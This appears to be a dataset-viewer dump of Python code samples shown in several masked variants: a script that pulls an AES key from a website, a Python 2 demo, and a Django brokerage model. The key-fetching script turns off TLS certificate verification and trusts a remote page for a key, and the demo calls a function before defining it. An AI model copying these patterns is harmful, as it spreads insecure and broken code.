key = data[data.index(b'<b>') + 3:data.index(b'</b>')]
print(key.decode('ascii'))
| #!/usr/bin/python3
import requests
import urllib3
urllib3.disable_warnings()
response = requests.get('https://freeaeskey.xyz', verify=False)
data = response.text.encode('utf-8')
key = data[data.index(b'<b>')+3:data.index(b'</b>')]
print(key.decode('ascii'))
| [
0,
1,
2,
3,
4
] |
98 | 57516a17c1f3ee208076852369999d74dbb2b3ba | def helloWorld():
print "We are in DEMO land!"
for i in range(10):
helloWorld()
print listBuilder()
def listBuilder():
b = []
for x in range(5):
b.append(10 * x)
return b
print "[done, for real]"
| null | null | null | null | [
0
] |
99 | 174f744b641ee20272713fa2fe1991cb2c76830a | <mask token>
| <mask token>
class Brokerage(models.Model):
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
<mask token>
| <mask token>
class Brokerage(models.Model):
BrokerageName = models.CharField(max_length=500)
ReviewLink = models.CharField(max_length=1000)
ContactLink = models.CharField(max_length=1000)
TotalAgents = models.IntegerField()
Location = models.CharField(max_length=500)
Desks = models.IntegerField()
YearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)
CommisionSplit = models.CharField(max_length=8)
Cap = models.DecimalField(max_digits=12, decimal_places=2)
TrainingPerWeek = models.IntegerField()
Onboarding = models.BooleanField()
Mentorship = models.BooleanField()
Teams_Hiring = models.BooleanField()
Marketing = models.CharField(max_length=500)
TotalListings = models.IntegerField()
ConferenceRooms = models.BooleanField()
OfficeLeaders = models.CharField(max_length=500)
| from django.db import models
class Brokerage(models.Model):
BrokerageName = models.CharField(max_length=500)
ReviewLink = models.CharField(max_length=1000)
ContactLink = models.CharField(max_length=1000)
TotalAgents = models.IntegerField()
Location = models.CharField(max_length=500)
Desks = models.IntegerField()
YearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)
CommisionSplit = models.CharField(max_length=8)
Cap = models.DecimalField(max_digits=12, decimal_places=2)
TrainingPerWeek = models.IntegerField()
Onboarding = models.BooleanField()
Mentorship = models.BooleanField()
Teams_Hiring = models.BooleanField()
Marketing = models.CharField(max_length=500)
TotalListings = models.IntegerField()
ConferenceRooms = models.BooleanField()
OfficeLeaders = models.CharField(max_length=500)
| from django.db import models
class Brokerage(models.Model):
BrokerageName = models.CharField(max_length=500)
#To-Do Fix additional settings for ImagesFields/FileFields
#BrokerageLogo = ImageField
ReviewLink = models.CharField(max_length=1000)
ContactLink = models.CharField(max_length=1000)
TotalAgents = models.IntegerField()
Location = models.CharField(max_length=500)
Desks = models.IntegerField()
YearlyCosts = models.DecimalField(max_digits=12, decimal_places=2)
CommisionSplit = models.CharField (max_length=8)
#To-Do set a getter for Cap that returns none
Cap = models.DecimalField(max_digits=12, decimal_places=2)
TrainingPerWeek = models.IntegerField()
Onboarding = models.BooleanField()
Mentorship = models.BooleanField()
Teams_Hiring = models.BooleanField()
Marketing = models.CharField(max_length=500)
TotalListings = models.IntegerField()
ConferenceRooms = models.BooleanField()
OfficeLeaders = models.CharField (max_length=500)
#OfficeLeaderPhoto = models.ImageField
| [
0,
1,
2,
3,
4
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.